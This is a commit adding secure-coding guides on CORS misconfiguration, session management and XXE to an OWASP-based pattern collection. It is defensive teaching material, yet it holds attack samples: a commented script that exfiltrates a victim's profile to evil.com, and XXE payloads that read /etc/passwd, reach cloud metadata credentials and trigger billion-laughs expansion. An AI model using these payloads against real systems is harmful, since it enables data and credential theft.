Add session management, CORS, XXE patterns

Complete the security patterns collection:

- session-management.md: fixation, hijacking, secure cookies, concurrent sessions
- cors.md: origin validation, reflected origin attacks, preflight caching
- xxe.md: external entities, DTD attacks, language-specific fixes

Now 19 patterns covering comprehensive web application security.

@@ -20,13 +20,14 @@ Based on OWASP Top 10:2025 and recent security research.
 | [audit-logging.md](audit-logging.md) | What to log, what not to log | A09 |
 | [error-handling.md](error-handling.md) | Fail closed, no sensitive info in errors | A10 |
 
-### Identity
+### Identity & Session
 
 | File | Topic | OWASP 2025 |
 |------|-------|------------|
 | [authentication.md](authentication.md) | Passwords, tokens, MFA, brute force protection | A07 |
 | [authorization.md](authorization.md) | Permission checks, IDOR prevention, privilege escalation | A01 |
 | [jwt-security.md](jwt-security.md) | Algorithm confusion, weak secrets, expiration | A07 |
+| [session-management.md](session-management.md) | Session fixation, hijacking, secure cookies | A07 |
 
 ### Attack Prevention
 
@@ -34,10 +35,12 @@ Based on OWASP Top 10:2025 and recent security research.
 |------|-------|------------|
 | [injection-prevention.md](injection-prevention.md) | SQL, command, template, path traversal | A05 |
 | [ssrf.md](ssrf.md) | Server-side request forgery, metadata endpoints | A10 |
+| [xxe.md](xxe.md) | XML external entities, DTD attacks | A05 |
 | [dos-prevention.md](dos-prevention.md) | Rate limiting, resource bounds, algorithmic complexity | — |
 | [prompt-injection.md](prompt-injection.md) | LLM security, data/instruction separation | — |
 | [deserialization.md](deserialization.md) | Untrusted data deserialization, pickle, yaml | A08 |
 | [race-conditions.md](race-conditions.md) | TOCTOU, atomic check-and-act, database locks | — |
+| [cors.md](cors.md) | Origin validation, credential handling | A01 |
 
 ### Infrastructure
 
@@ -50,13 +53,13 @@ Based on OWASP Top 10:2025 and recent security research.
 
 | # | Category | Pattern |
 |---|----------|---------|
-| A01 | Broken Access Control | authorization.md |
+| A01 | Broken Access Control | authorization.md, cors.md |
 | A02 | Security Misconfiguration | secure-defaults.md |
 | A03 | Software Supply Chain Failures | supply-chain.md |
 | A04 | Cryptographic Failures | cryptography.md |
-| A05 | Injection | injection-prevention.md |
+| A05 | Injection | injection-prevention.md, xxe.md |
 | A06 | Insecure Design | secure-defaults.md |
-| A07 | Authentication Failures | authentication.md, jwt-security.md |
+| A07 | Authentication Failures | authentication.md, jwt-security.md, session-management.md |
 | A08 | Software or Data Integrity Failures | deserialization.md |
 | A09 | Security Logging and Alerting Failures | audit-logging.md |
 | A10 | Mishandling of Exceptional Conditions | error-handling.md, ssrf.md |
@@ -0,0 +1,183 @@
# CORS Misconfiguration

## Rule

Never reflect the `Origin` header blindly. Allowlist specific origins. Don't combine credentials with a wildcard origin.

**Source:** [OWASP Cross-Site Request Forgery Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)

## CORS Basics

Browsers block scripts from reading cross-origin responses by default. CORS headers selectively allow them:

| Header | Purpose |
|--------|---------|
| `Access-Control-Allow-Origin` | Which origins can access |
| `Access-Control-Allow-Credentials` | Allow cookies/auth |
| `Access-Control-Allow-Methods` | Allowed HTTP methods |
| `Access-Control-Allow-Headers` | Allowed request headers |

## Correct Pattern

```python
from flask import Flask, make_response, request

app = Flask(__name__)

ALLOWED_ORIGINS = {
    "https://app.example.com",
    "https://admin.example.com",
}

def add_cors_headers(response):
    origin = request.headers.get("Origin")

    # Validate against allowlist
    if origin in ALLOWED_ORIGINS:
        response.headers["Access-Control-Allow-Origin"] = origin
        response.headers["Access-Control-Allow-Credentials"] = "true"
        response.headers["Access-Control-Allow-Methods"] = "GET, POST, PUT, DELETE"
        response.headers["Access-Control-Allow-Headers"] = "Content-Type, Authorization"

    # Important for caching! Set on every response so caches key on Origin
    response.headers["Vary"] = "Origin"

    return response

# For public APIs without credentials
def add_public_cors(response):
    response.headers["Access-Control-Allow-Origin"] = "*"
    # Note: credentials CANNOT be used with wildcard
    response.headers["Access-Control-Allow-Methods"] = "GET"
    return response

# Handle preflight requests
@app.route("/api/<path:path>", methods=["OPTIONS"])
def preflight(path):
    response = make_response()
    return add_cors_headers(response)
```

## Incorrect Pattern

```python
# Wrong: reflect any origin (allows any site to access)
@app.after_request
def bad_cors(response):
    origin = request.headers.get("Origin")
    response.headers["Access-Control-Allow-Origin"] = origin  # Reflected!
    response.headers["Access-Control-Allow-Credentials"] = "true"
    return response
# Attack: evil.com can now make authenticated requests

# Wrong: wildcard with credentials
response.headers["Access-Control-Allow-Origin"] = "*"
response.headers["Access-Control-Allow-Credentials"] = "true"
# Browsers reject this combination, but it shows a misunderstanding of CORS

# Wrong: suffix match without a dot boundary
def check_origin(origin):
    return origin.endswith("example.com")
# Bypassed by: https://attacker-example.com
# Note: endswith(".example.com") blocks that host but still accepts
# http:// origins and any compromised or taken-over subdomain

# Wrong: null origin allowed
ALLOWED_ORIGINS = {"https://app.example.com", "null"}
# "null" origin sent by sandboxed iframes, file:// URLs - attacker controlled!

# Wrong: substring match
def check_origin(origin):
    return "example.com" in origin
# Bypassed by: https://example.com.evil.com
```
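
The naive checks can be exercised directly to see which attacker-controlled origins slip through. This is a minimal sketch: the attacker hostnames are made up, and `suffix_check`, `substring_check`, and `is_allowed` are hypothetical helper names used only for illustration.

```python
ALLOWED_ORIGINS = {"https://app.example.com", "https://admin.example.com"}

def suffix_check(origin: str) -> bool:
    """Naive: suffix match with no dot boundary."""
    return origin.endswith("example.com")

def substring_check(origin: str) -> bool:
    """Naive: substring match anywhere in the origin."""
    return "example.com" in origin

def is_allowed(origin: str) -> bool:
    """Exact match against the allowlist; "null" never matches."""
    return origin in ALLOWED_ORIGINS

# Hypothetical attacker-controlled origins
ATTACKS = [
    "https://attacker-example.com",  # accepted by suffix_check
    "https://example.com.evil.com",  # accepted by substring_check
    "null",                          # sandboxed iframe or file:// page
]

for origin in ATTACKS:
    print(origin, suffix_check(origin), substring_check(origin), is_allowed(origin))
```

Only the exact-match check rejects all three origins, which is why the allowlist comparison is the default recommendation.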

## Origin Validation

```python
from urllib.parse import urlparse

ALLOWED_ORIGINS = {"https://app.example.com", "https://admin.example.com"}

def is_valid_origin(origin: str) -> bool:
    """Strict origin validation."""
    if not origin:
        return False

    # Never allow null
    if origin == "null":
        return False

    # Exact match against allowlist
    if origin in ALLOWED_ORIGINS:
        return True

    # If you need subdomain matching, be careful:
    try:
        parsed = urlparse(origin)
        # Must be HTTPS
        if parsed.scheme != "https":
            return False

        # Exact domain match (not suffix!)
        allowed_domains = {"app.example.com", "admin.example.com"}
        if parsed.netloc in allowed_domains:
            return True

        # Subdomain of specific parent (careful!)
        if parsed.netloc.endswith(".trusted.example.com"):
            # Verify it's actually a subdomain, not a suffix attack;
            # all(parts) rejects empty labels such as ".trusted.example.com"
            parts = parsed.netloc.split(".")
            if len(parts) >= 4 and all(parts) and parts[-3:] == ["trusted", "example", "com"]:
                return True
    except ValueError:
        # urlparse raises ValueError on malformed input
        return False

    return False
```

## Attack Scenarios

```python
# Scenario 1: Data theft via reflected origin
#
# Vulnerable server reflects any Origin with credentials
#
# Attacker's evil.com:
# <script>
# fetch("https://api.victim.com/user/profile", {
#     credentials: "include"
# })
# .then(r => r.json())
# .then(data => {
#     // Send stolen data to attacker
#     fetch("https://evil.com/steal?data=" + JSON.stringify(data))
# })
# </script>

# Scenario 2: CSRF via CORS
#
# If CORS allows credentials from evil.com,
# evil.com can make authenticated state-changing requests
```

## Preflight Caching

```python
@app.after_request
def cors_headers(response):
    origin = request.headers.get("Origin")
    if origin in ALLOWED_ORIGINS:
        response.headers["Access-Control-Allow-Origin"] = origin
        response.headers["Access-Control-Allow-Credentials"] = "true"
        # Cache preflight for up to 24h (browsers may cap this at a lower value)
        response.headers["Access-Control-Max-Age"] = "86400"
    # CRITICAL for caching: set on every response, allowed origin or not
    response.headers["Vary"] = "Origin"
    return response

# Why Vary: Origin matters:
# Without it, CDN might cache response for origin A
# Then serve that cached response to origin B (wrong ACAO header!)
```
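
Assigning `Vary` outright, as above, replaces any value set earlier in the response pipeline (for example `Accept-Encoding` from a compression layer). The sketch below merges the field instead. `merge_vary` is a hypothetical, framework-free helper; Werkzeug-based responses should be able to achieve the same with `response.vary.add("Origin")`.

```python
from typing import Optional

def merge_vary(existing: Optional[str], field: str) -> str:
    """Return a Vary value that includes `field` without dropping existing entries."""
    if not existing:
        return field
    parts = [p.strip() for p in existing.split(",") if p.strip()]
    if "*" in parts:
        # "Vary: *" already means "never reuse from cache"
        return "*"
    if field.lower() not in (p.lower() for p in parts):
        parts.append(field)
    return ", ".join(parts)

print(merge_vary("Accept-Encoding", "Origin"))
```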

## Edge Cases

- WebSocket connections don't use CORS (validate the `Origin` header manually)
- `Access-Control-Expose-Headers` needed for scripts to read custom response headers
- Preflight not sent for "simple" requests (GET, HEAD, or POST with only safelisted headers and content types)
- Internal APIs should still validate Origin (defense in depth)
- Browser extensions can bypass CORS (not a vulnerability)
- Server-to-server requests don't involve CORS
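
Because browsers do not apply CORS to WebSocket handshakes, the server has to compare the handshake's `Origin` header against the allowlist itself. A minimal, framework-agnostic sketch follows; `handshake_allowed` and the plain `dict` of headers are assumptions for illustration, not a specific WebSocket library's API.

```python
ALLOWED_ORIGINS = {"https://app.example.com", "https://admin.example.com"}

def handshake_allowed(headers: dict) -> bool:
    """Accept a WebSocket upgrade only if its Origin is on the allowlist."""
    # Header names are case-insensitive, so normalize before lookup
    normalized = {name.lower(): value for name, value in headers.items()}
    origin = normalized.get("origin")
    # A missing Origin is treated as untrusted for browser-facing endpoints
    return origin is not None and origin in ALLOWED_ORIGINS

print(handshake_allowed({"Origin": "https://app.example.com"}))
print(handshake_allowed({"Origin": "https://evil.example"}))
```

Non-browser clients can send any `Origin` they like, so this check complements authentication rather than replacing it.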
@@ -0,0 +1,185 @@
# Session Management

## Rule

Generate unpredictable session IDs. Bind sessions to users. Expire aggressively. Regenerate on privilege change.

**Source:** [OWASP Session Management Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html)

## Session Attacks

| Attack | Description | Defense |
|--------|-------------|---------|
| Session fixation | Attacker sets victim's session ID | Regenerate on login |
| Session hijacking | Steal session via XSS/network | httpOnly, Secure flags |
| Session prediction | Guess valid session IDs | Cryptographic randomness |
| Session replay | Reuse captured session | Short expiration, binding |

## Correct Pattern

```python
import secrets
from datetime import datetime, timedelta, timezone
from flask import session, request

# Generate cryptographically secure session ID
def generate_session_id() -> str:
    return secrets.token_urlsafe(32)  # 256 bits of entropy

# Session configuration
SESSION_CONFIG = {
    "cookie_name": "__Host-session",  # __Host- prefix requires Secure, Path=/, and no Domain
    "httponly": True,                 # Not accessible to JavaScript
    "secure": True,                   # HTTPS only
    "samesite": "Lax",                # CSRF protection
    "max_age": 3600,                  # Cookie lifetime: 1 hour
}

# User, verify_password, and invalidate_session_server_side are
# application-specific helpers that are not shown here.

# Regenerate session on privilege change
def login(user: "User", password: str) -> bool:
    if not verify_password(user, password):
        return False

    # CRITICAL: regenerate session ID to prevent fixation.
    # session.regenerate() stands in for your session backend's rotation call;
    # Flask's built-in cookie session has no such method.
    session.regenerate()

    session["user_id"] = user.id
    session["login_time"] = datetime.now(timezone.utc).isoformat()
    session["ip"] = request.remote_addr
    session["user_agent"] = request.user_agent.string

    return True

def logout():
    # Invalidate server-side, not just client cookie
    session_id = session.get("_id")  # key name depends on your session backend
    if session_id:
        invalidate_session_server_side(session_id)
    session.clear()

# Validate session binding
def validate_session() -> bool:
    if "user_id" not in session:
        return False

    # Check session age (absolute limit); a missing or malformed
    # timestamp is treated as an invalid session
    try:
        login_time = datetime.fromisoformat(session.get("login_time", ""))
    except ValueError:
        logout()
        return False
    if datetime.now(timezone.utc) - login_time > timedelta(hours=8):
        logout()
        return False

    # Optional: bind to IP (careful with mobile/proxies)
    # if session.get("ip") != request.remote_addr:
    #     logout()
    #     return False

    return True
```
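
To make the cookie flags in `SESSION_CONFIG` concrete, the sketch below builds the resulting `Set-Cookie` value with the standard library only. `build_session_cookie` is a hypothetical helper; a real application would normally let its framework emit the header.

```python
import secrets
from http.cookies import SimpleCookie

def build_session_cookie(session_id: str) -> str:
    """Return a Set-Cookie value carrying the hardened attributes."""
    cookie = SimpleCookie()
    cookie["__Host-session"] = session_id
    morsel = cookie["__Host-session"]
    morsel["path"] = "/"        # required by the __Host- prefix
    morsel["secure"] = True     # HTTPS only
    morsel["httponly"] = True   # hidden from JavaScript
    morsel["samesite"] = "Lax"  # limits cross-site sending
    morsel["max-age"] = 3600    # one hour
    # No Domain attribute is set: the __Host- prefix forbids it
    return morsel.OutputString()

print(build_session_cookie(secrets.token_urlsafe(32)))
```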

## Incorrect Pattern

```python
import random
import hashlib

# Wrong: predictable session ID
def bad_session_id():
    return str(random.randint(1000000, 9999999))

# Wrong: sequential session ID
COUNTER = 0
def bad_session_id_2():
    global COUNTER
    COUNTER += 1
    return str(COUNTER)

# Wrong: user-derived session ID
def bad_session_id_3(user_id):
    return hashlib.md5(str(user_id).encode()).hexdigest()

# Wrong: no regeneration on login (session fixation)
def bad_login(user, password):
    if verify_password(user, password):
        session["user_id"] = user.id  # Same session ID!
        return True
    return False

# Wrong: client-side only logout
def bad_logout():
    response = redirect("/")
    response.delete_cookie("session")
    return response
# Session still valid server-side!

# Wrong: missing cookie security flags
app.config["SESSION_COOKIE_HTTPONLY"] = False  # XSS can steal
app.config["SESSION_COOKIE_SECURE"] = False    # Sent over HTTP
```

## Session Fixation Attack

```python
# Attack scenario:
# 1. Attacker visits site, gets session ID "abc123"
# 2. Attacker sends victim link: https://site.com/?sessionid=abc123
# 3. Victim clicks, their browser now uses "abc123"
# 4. Victim logs in (session ID unchanged!)
# 5. Attacker uses "abc123" - now authenticated as victim

# Defense: ALWAYS regenerate on login
@app.route("/login", methods=["POST"])
def login():
    if authenticate(request.form):
        # New session ID. regenerate() is pseudocode for your session
        # backend's rotation call; Flask's built-in session has no such method.
        session.regenerate()
        session["authenticated"] = True
    return redirect("/")
```
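
What rotation has to guarantee can be shown without any framework: the old ID must stop resolving the moment the new one is issued. The sketch below uses a hypothetical in-memory `SessionStore`; a production store would live in a database or cache.

```python
import secrets

class SessionStore:
    """Hypothetical in-memory server-side session store."""

    def __init__(self):
        self._data = {}

    def create(self) -> str:
        sid = secrets.token_urlsafe(32)
        self._data[sid] = {}
        return sid

    def get(self, sid: str):
        return self._data.get(sid)

    def regenerate(self, old_sid: str) -> str:
        """Issue a fresh ID, carry the data over, and invalidate the old ID."""
        data = self._data.pop(old_sid, {})
        new_sid = secrets.token_urlsafe(32)
        self._data[new_sid] = data
        return new_sid

store = SessionStore()
attacker_sid = store.create()                # ID the attacker planted on the victim
victim_sid = store.regenerate(attacker_sid)  # rotation at login
store.get(victim_sid)["user_id"] = 42

print(store.get(attacker_sid))  # the planted ID no longer resolves
```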

## Concurrent Session Control

```python
from datetime import datetime, timezone

# Limit active sessions per user.
# Session is assumed to be an application-defined model with
# query/create/delete helpers; adapt the calls to your data layer.
MAX_SESSIONS_PER_USER = 3

def create_session(user_id: str) -> str:
    # Get existing sessions, oldest first
    existing = Session.query.filter_by(user_id=user_id).order_by(
        Session.created_at.asc()
    ).all()

    # Remove oldest sessions until there is room for the new one
    excess = len(existing) - MAX_SESSIONS_PER_USER + 1
    for stale in existing[:max(excess, 0)]:
        stale.delete()
        # Optionally notify user: "Logged out of oldest session"

    # Create new session
    session_id = generate_session_id()
    Session.create(
        id=session_id,
        user_id=user_id,
        created_at=datetime.now(timezone.utc),
        ip=request.remote_addr
    )
    return session_id

# Allow user to view/revoke sessions
@app.route("/settings/sessions")
def list_sessions():
    sessions = Session.query.filter_by(user_id=current_user.id).all()
    return render_template("sessions.html", sessions=sessions)

@app.route("/settings/sessions/<session_id>/revoke", methods=["POST"])
def revoke_session(session_id):
    # Named "target" to avoid shadowing flask.session
    target = Session.query.get(session_id)
    if target and target.user_id == current_user.id:
        target.delete()
    return redirect("/settings/sessions")
```

## Edge Cases

- Mobile apps: use short-lived access tokens, not sessions
- "Remember me": separate long-lived token, not extended session
- Password change should invalidate all other sessions
- Admin impersonation needs audit trail
- Idle timeout vs absolute timeout (both needed)
- Session data size limits (don't store large objects)
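
The idle and absolute timeouts are separate checks, and a session should end when either one trips. A small sketch under assumed limits (30 minutes idle, 8 hours absolute); `session_expired` is a hypothetical helper and the values are placeholders to tune per application.

```python
from datetime import datetime, timedelta, timezone

IDLE_TIMEOUT = timedelta(minutes=30)   # assumed value
ABSOLUTE_TIMEOUT = timedelta(hours=8)  # assumed value

def session_expired(created_at: datetime, last_seen: datetime, now: datetime) -> bool:
    """True if the session has been idle too long OR has existed too long."""
    idle_for = now - last_seen
    alive_for = now - created_at
    return idle_for > IDLE_TIMEOUT or alive_for > ABSOLUTE_TIMEOUT

start = datetime(2025, 1, 1, 9, 0, tzinfo=timezone.utc)

# Active user, but the session is nine hours old: the absolute limit applies
print(session_expired(start, start + timedelta(hours=8, minutes=55), start + timedelta(hours=9)))
```

Checking only the idle timeout would let a continuously used (or continuously replayed) session live forever, which is why both limits are needed.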
@@ -0,0 +1,181 @@
# XML External Entities (XXE)

## Rule

Disable external entity processing. Disable DTDs. Use safe parser defaults.

**Source:** [OWASP XXE Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)

## What XXE Can Do

- **File disclosure**: Read `/etc/passwd`, config files, source code
- **SSRF**: Make requests to internal services
- **DoS**: Billion laughs attack (exponential entity expansion)
- **Port scanning**: Error-based probing of internal ports
- **RCE**: In some configurations (PHP expect://)

## Attack Payloads

```xml
<!-- File disclosure -->
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>

<!-- SSRF to cloud metadata -->
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<data>&xxe;</data>

<!-- Billion laughs DoS -->
<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!-- ... continues exponentially -->
]>
<lolz>&lol9;</lolz>
```
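
The growth in the billion laughs payload is simple arithmetic: each entity references the previous one ten times, so the expanded size multiplies by ten per level. The sketch below assumes the elided levels (`lol4` to `lol9`) follow the same ten-fold pattern as `lol2` and `lol3`; `expanded_size` is a hypothetical helper.

```python
def expanded_size(level: int, fanout: int = 10, base: str = "lol") -> int:
    """Bytes produced when the entity at `level` is fully expanded.

    Level 1 is the base string itself; each further level repeats the
    previous level `fanout` times.
    """
    return len(base) * fanout ** (level - 1)

for level in (2, 3, 9):
    print(f"lol{level}: {expanded_size(level):,} bytes")
```

Under that assumption a payload of a few hundred bytes expands to roughly 300 MB at `lol9`, which is why entity expansion has to be limited or disabled rather than filtered by input size.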

## Correct Pattern

```python
# Python - defusedxml (recommended)
import defusedxml.ElementTree as ET

def parse_xml_safe(xml_string: str):
    """Parse XML with XXE protection."""
    return ET.fromstring(xml_string)

# Python - standard library
# Imported under a different alias so it does not shadow defusedxml's ET
import xml.etree.ElementTree as StdET

def parse_xml_manual(xml_string: str):
    """Standard-library parsing; no extra hardening is applied here."""
    parser = StdET.XMLParser()
    # Python's ElementTree doesn't resolve external entities by default,
    # but it can still be exposed to entity-expansion DoS on older Expat builds.
    # Always verify your specific library and version!
    return StdET.fromstring(xml_string, parser=parser)

# lxml with safe settings
from lxml import etree

def parse_xml_lxml(xml_string: str):
    """lxml with XXE disabled."""
    parser = etree.XMLParser(
        resolve_entities=False,
        no_network=True,
        dtd_validation=False,
        load_dtd=False,
    )
    return etree.fromstring(xml_string.encode(), parser=parser)
```

## Incorrect Pattern

```python
from lxml import etree

# Wrong: relying on lxml defaults (older releases resolve entities by default)
def bad_parse(xml_string: str):
    return etree.fromstring(xml_string)

# Wrong: explicitly enabling dangerous features
def bad_parse_2(xml_string: str):
    parser = etree.XMLParser(resolve_entities=True)
    return etree.fromstring(xml_string, parser=parser)

# Wrong: using xml.dom.minidom without protection
from xml.dom.minidom import parseString
def bad_parse_3(xml_string: str):
    return parseString(xml_string)  # May be vulnerable

# Wrong: SAX parser without disabling features
# (external general entities are only off by default since Python 3.7.1)
import xml.sax
def bad_parse_4(xml_string: str):
    handler = MyHandler()  # placeholder for an application ContentHandler
    xml.sax.parseString(xml_string, handler)
```

## Language-Specific Fixes

### Java

```java
// DocumentBuilderFactory
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);

// SAXParserFactory
SAXParserFactory spf = SAXParserFactory.newInstance();
spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
spf.setFeature("http://xml.org/sax/features/external-general-entities", false);
spf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
```

### .NET

```csharp
// XmlReader (safe by default in .NET 4.5.2+)
XmlReaderSettings settings = new XmlReaderSettings();
settings.DtdProcessing = DtdProcessing.Prohibit;
settings.XmlResolver = null;
XmlReader reader = XmlReader.Create(stream, settings);

// XmlDocument
XmlDocument doc = new XmlDocument();
doc.XmlResolver = null;  // Disable external resources
doc.LoadXml(xmlString);
```

### PHP

```php
// Disable entity loading globally.
// Only needed before PHP 8.0: the function is deprecated as of PHP 8.0,
// where libxml no longer loads external entities by default.
libxml_disable_entity_loader(true);

// Wrong: these flags turn ON entity substitution and DTD loading
$doc = new DOMDocument();
$doc->loadXML($xml, LIBXML_NOENT | LIBXML_DTDLOAD | LIBXML_DTDATTR);

// Better: leave those flags out and block network access
$doc->loadXML($xml, LIBXML_NONET);
```

## When You Need DTDs

```python
from lxml import etree

# If you absolutely need DTD validation (rare):
# 1. Allowlist specific DTDs
# 2. Fetch DTDs from local filesystem only
# 3. Never allow user-controlled DTD URLs

ALLOWED_DTDS = {
    "-//W3C//DTD XHTML 1.0 Strict//EN": "/path/to/local/xhtml1-strict.dtd"
}

class SafeResolver(etree.Resolver):
    def resolve(self, system_url, public_id, context):
        if public_id in ALLOWED_DTDS:
            return self.resolve_filename(ALLOWED_DTDS[public_id], context)
        raise ValueError(f"DTD not allowed: {public_id}")

# Register the resolver on a parser that loads DTDs but never touches the network
parser = etree.XMLParser(load_dtd=True, no_network=True)
parser.resolvers.add(SafeResolver())
```

## Edge Cases

- SVG files are XML: validate uploads!
- SOAP/XML-RPC endpoints are XXE targets
- Office documents (DOCX, XLSX) contain XML
- Configuration files (Maven pom.xml, Spring beans.xml)
- RSS/Atom feeds
- SAML assertions
- Blind XXE (out-of-band data exfiltration via DNS/HTTP)
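
For upload paths such as SVG, one conservative option is to refuse any document that declares a DOCTYPE before it reaches a full-featured parser. The sketch below uses only the standard library's Expat binding; `reject_doctype` and `DoctypeForbidden` are hypothetical names, and this is an illustration of the idea rather than a replacement for a hardened parser such as defusedxml.

```python
import xml.parsers.expat

class DoctypeForbidden(ValueError):
    """Raised when an XML document declares a DOCTYPE."""

def reject_doctype(xml_bytes: bytes) -> None:
    """Raise DoctypeForbidden if the document contains a DOCTYPE declaration.

    Malformed XML raises xml.parsers.expat.ExpatError instead.
    """
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Abort as soon as the declaration starts, before any entity is defined
        raise DoctypeForbidden(f"DOCTYPE not allowed: {name}")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(xml_bytes, True)

# A plain SVG without a DOCTYPE passes silently
reject_doctype(b'<svg xmlns="http://www.w3.org/2000/svg"><rect/></svg>')
```

Rejecting DOCTYPE outright also blocks the billion laughs payload, since internal entities can only be declared inside a DTD.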